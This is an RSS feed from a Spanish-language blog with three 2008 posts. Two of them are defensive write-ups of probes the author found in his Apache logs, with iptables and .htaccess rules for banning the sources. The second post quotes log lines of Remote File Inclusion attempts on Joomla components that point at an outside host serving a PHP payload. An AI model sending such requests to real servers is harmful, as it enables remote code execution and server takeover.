<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>EntreBits &#187; seguridad</title>
	<atom:link href="http://rd.entrebits.com.mx/tag/seguridad/feed/" rel="self" type="application/rss+xml" />
	<link>http://rd.entrebits.com.mx</link>
	<description>Lo que dejo entre bits.</description>
	<lastBuildDate>Mon, 02 Jan 2012 09:44:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Podcast EntreBits: Google Chome, Redes Sociales, Seguridad</title>
		<link>http://rd.entrebits.com.mx/2008/09/05/podcast-entrebits-google-chome-redes-sociales-seguridad/</link>
		<comments>http://rd.entrebits.com.mx/2008/09/05/podcast-entrebits-google-chome-redes-sociales-seguridad/#comments</comments>
		<pubDate>Sat, 06 Sep 2008 04:58:29 +0000</pubDate>
		<dc:creator>Rodrigo</dc:creator>
				<category><![CDATA[Podcast]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Redes Sociales]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://rd.entrebits.com.mx/?p=166</guid>
		<description><![CDATA[TweetTweet]]></description>
			<content:encoded><![CDATA[<p>   <embed src="http://www.switchpod.com/mp3list.swf" FlashVars="MyFile=http://www.switchpod.com/users/entrebitsmx/feed.xml&#038;MyPodcast=&#038;MySong=&#038;MyAuto=No" quality="high" bgcolor="#ffffff" width="325" height="100" name="mp3list" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash"   pluginspage="http://www.macromedia.com/go/getflashplayer" /></p>
<div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/09/05/podcast-entrebits-google-chome-redes-sociales-seguridad/&via=entrebitsmx&text=Podcast EntreBits: Google Chome, Redes Sociales, Seguridad&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/09/05/podcast-entrebits-google-chome-redes-sociales-seguridad/&via=entrebitsmx&text=Podcast EntreBits: Google Chome, Redes Sociales, Seguridad&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div>]]></content:encoded>
			<wfw:commentRss>http://rd.entrebits.com.mx/2008/09/05/podcast-entrebits-google-chome-redes-sociales-seguridad/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Seguridad: protegete de espías 2</title>
		<link>http://rd.entrebits.com.mx/2008/04/22/seguridad-protegete-de-espias-2/</link>
		<comments>http://rd.entrebits.com.mx/2008/04/22/seguridad-protegete-de-espias-2/#comments</comments>
		<pubDate>Tue, 22 Apr 2008 22:44:32 +0000</pubDate>
		<dc:creator>Rodrigo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Opinión]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Programación]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://rd.entrebits.com.mx/?p=23</guid>
		<description><![CDATA[En el post anterior hablaba de intrusos que buscan detectar vulnerabilidades de algunos scripts. Bueno pues veo que cada vez hay un mayor número de estas &#8220;herramientas&#8221; (para kiddies) que no hacen otra cosa que hacernos perder el tiempo. Voy... ]]></description>
			<content:encoded><![CDATA[<p>En el post anterior hablaba de intrusos que buscan detectar vulnerabilidades de algunos scripts.</p>
<p>Bueno pues veo que cada vez hay un mayor número de estas &#8220;herramientas&#8221; (para kiddies) que no hacen otra cosa que hacernos perder el tiempo.</p>
<p>Voy a dedicar una sección en este blog para hablar acerca de estas herramientas, pero primero, lo primero.</p>
<blockquote><p>217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 310 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;<br />
217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 303 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;<br />
217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 310 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;<br />
217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 303 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;<br />
217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 310 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;<br />
217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_smf/smf.php?mosConfig_absolute_path=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 303 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;</p></blockquote>
<p>Como podrán ver en esos logs, hacen peticiones hacia archivos específicos. Por el nombre de los directorios se puede deducir claramente que los directorios que buscan pertenecen a la estructura de el CMS Joomla.</p>
<p>Deben de usar un scanner de ips,  por que ni siquiera se tomaron la molestia de verificar si en este servidor hay Joomla instalado (no, no hay, ni lo habrá).</p>
<p>Algunos blogs recomiendan bannear ese user-agent &#8220;Morfeus Fucking Scanner&#8221;, lo cual si serviría temporalmente, ya que cambiando el user-agent del scanner se soluciona el asunto.</p>
<p>Para bloquear ese scanner por medio de su user-agent basta con agregar esto al .htaccess</p>
<p><code>RewriteEngine On<br />
RewriteCond %{HTTP_USER_AGENT} ^Morfeus<br />
RewriteRule ^.*$ - [F]</code><br />
Con estas líneas se le denegaría el acceso al user-agent, pero no a la ip.</p>
<p>Otros recomiendan devolverles el favor a los espías con estas líneas<br />
<code>RewriteEngine On<br />
RewriteCond %{HTTP_USER_AGENT} (^Morfeus) [NC]<br />
RewriteRule .* http://%{REMOTE_ADDR} [r=301,l]</code><br />
Con las líneas anteriores se hace un forwarding a la misma ip de donde proviene el ataque. Pero al igual que con el código anterior, solo se le denegará el acceso al user-agent y no a la ip.</p>
<p>Yo recomiendo agregar reglas para banear las ips.<br />
<code>iptables -A INPUT -s LAIP -j DROP</code></p>
<p>Pero si no tenemos acceso a las iptables, también podremos bannear a los espías mediante el archivo  .htaccess de la siguiente manera:</p>
<p><code>#Morfeus Fucking Hacker<br />
deny from 217.118.2.160</code></p>
<p>Se que es algo molesto andar editando el archivo cada vez que un nuevo espía se acerque a nosotros, pero es mejor que podemos hacer sino tenemos acceso para bannear desde iptables.</p>
<p>¿Pero que ganan exactamente los espías al encontrar lo que buscan?</p>
<p>Bueno pues pongamos atención a la siguiente línea:</p>
<blockquote><p>217.118.2.160 &#8211; - [20/Apr/2008:18:03:37 -0500] &#8220;GET /components/com_forum/download.php?phpbb_root_path?=http://dwlz2.dwlz2.com/~dwlz2/ice.txt/ HTTP/1.1&#8243; 404 310 &#8220;-&#8221; &#8220;Morfeus Fucking Scanner&#8221;</p></blockquote>
<p>Lo que buscan hacer se llama <a href="http://es.wikipedia.org/wiki/Remote_File_Inclusion_%28RFI%29">RFI (Remote File Inclusion)</a> que consiste según wikipedia en:</p>
<blockquote><p><strong>Remote File Inclusion</strong>, traducido al español como Inclusión Remota de Archivos &#8211; vulnerabilidad existente solamente en <span class="new">páginas dinámicas</span> en PHP que permite  el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().</p></blockquote>
<p>En pocas palabras ellos cuelgan un archivo en otro servidor (En este caso http://dwlz2.dwlz2.com/~dwlz2/ice.txt) que tiene código PHP que permite al atacante tomar control sobre el servidor, o al menos, usar código PHP para construir scripts para funciones específicas (spam, defaces, craking, etc). Verdaderamente es de <strong>extrema importancia </strong>cuidarnos de este tipo de ataques, ya que muchas cosas se ven comprometidas (Incluso la Base de datos).</p>
<div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/04/22/seguridad-protegete-de-espias-2/&via=entrebitsmx&text=Seguridad: protegete de espías 2&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/04/22/seguridad-protegete-de-espias-2/&via=entrebitsmx&text=Seguridad: protegete de espías 2&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div>]]></content:encoded>
			<wfw:commentRss>http://rd.entrebits.com.mx/2008/04/22/seguridad-protegete-de-espias-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Seguridad: protegete de espías</title>
		<link>http://rd.entrebits.com.mx/2008/04/16/seguridad-protegete-de-espias/</link>
		<comments>http://rd.entrebits.com.mx/2008/04/16/seguridad-protegete-de-espias/#comments</comments>
		<pubDate>Wed, 16 Apr 2008 07:42:18 +0000</pubDate>
		<dc:creator>Rodrigo</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[iptables]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://rd.entrebits.com.mx/?p=22</guid>
		<description><![CDATA[Ha sido una semana muy dura, mucho trabajo y muchas cosas pendientes por hacer. Estaba revisando los logs de apache y vi unas cosas raras: 69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221; 69.64.197.157 &#8211; -... ]]></description>
			<content:encoded><![CDATA[<p>Ha sido una semana muy dura, mucho trabajo y muchas cosas pendientes por hacer.</p>
<p>Estaba revisando los logs de apache y vi unas cosas raras:</p>
<blockquote><p>69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpMyAdmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpMyAdmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPMYADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPMYADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /pHpMyAdMiN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /pHpMyAdMiN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PhPmYaDmIn/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PhPmYaDmIn/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPMYadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /PHPMYadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpMYadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpMYadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpmyADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:07 -0500] &#8220;GET /phpmyADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /pmamy/main.php HTTP/1.0&#8243; 404 291 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /pmamy/main.php HTTP/1.0&#8243; 404 291 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /pma/main.php HTTP/1.0&#8243; 404 289 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /pma/main.php HTTP/1.0&#8243; 404 289 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /PMA/main.php HTTP/1.0&#8243; 404 289 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /PMA/main.php HTTP/1.0&#8243; 404 289 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /myadmin/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /myadmin/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /phpmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /phpmyadmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /MYADMIN/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /MYADMIN/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /phpMyAdmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /phpMyAdmin/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /MYadmin/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /MYadmin/main.php HTTP/1.0&#8243; 404 293 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /PHPMYADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;<br />
69.64.197.157 &#8211; - [15/Apr/2008:07:06:08 -0500] &#8220;GET /PHPMYADMIN/main.php HTTP/1.0&#8243; 404 296 &#8220;-&#8221; &#8220;-&#8221;</p></blockquote>
<p>Bueno a  primera vista se ve que buscan vulnerabilidades del phpmyadmin, pero primero tienen que saber donde está (si es que está), intentaron con no menos de 100 nombres distintos de carpetas y archivos, así que mejor añadí una regla a las IPTABLES para bannear definitivamente esa ip</p>
<p><code>iptables -A INPUT -s 69.64.197.157  -j DROP<br />
</code></p>
<p>Bueno eso no fui lo único que vi en los logs, también andaba un scanner:</p>
<blockquote><p>67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;<br />
67.205.68.215 &#8211; - [15/Apr/2008:17:13:18 -0500] &#8220;GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1&#8243; 400 300 &#8220;-&#8221; &#8220;-&#8221;</p></blockquote>
<p>Bueno investigando un poco veo que se trata de un <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2005-011411-1411-99">scanner que busca vulnerabilidades</a> bueno si ponen esa dirección en el navegador <a href="http://67.205.68.215/">http://67.205.68.215/</a> verán que es un servidor con Plesk instalado (en plataforma windows por cierto) ,  bueno aplicando lo mismo agregue una regla para banear esa ip<br />
<code>iptables -A INPUT -s  67.205.68.215 -j DROP</code></p>
<p>Les sugiero que si ven en sus logs algo parecido a esto agreguen unas reglas para banear las ips &#8220;No bienvenidas&#8221;.</p>
<div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/04/16/seguridad-protegete-de-espias/&via=entrebitsmx&text=Seguridad: protegete de espías&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div><div style="float: right; margin-left: 10px;"><a href="http://twitter.com/share?url=http://rd.entrebits.com.mx/2008/04/16/seguridad-protegete-de-espias/&via=entrebitsmx&text=Seguridad: protegete de espías&related=:&lang=en&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div>]]></content:encoded>
			<wfw:commentRss>http://rd.entrebits.com.mx/2008/04/16/seguridad-protegete-de-espias/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

